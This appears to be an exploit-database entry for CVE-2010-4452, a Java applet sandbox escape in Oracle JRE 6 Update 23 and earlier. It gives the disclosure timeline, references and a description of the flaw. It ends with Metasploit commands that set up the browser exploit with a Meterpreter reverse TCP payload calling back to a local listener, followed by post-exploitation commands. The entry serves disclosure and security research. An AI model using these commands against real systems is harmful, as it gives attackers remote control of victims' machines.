Timeline :
Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15
PoC provided by :
Frederic Hoguin
jduck
Reference(s) :
CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle
Affected version(s) :
Oracle JRE 6 & JDK 6 Update 23 and before
Tested on Windows XP SP3 with :
Oracle JRE 6 Update 16
Description :
This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.
Commands :
use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsysinfo
getuid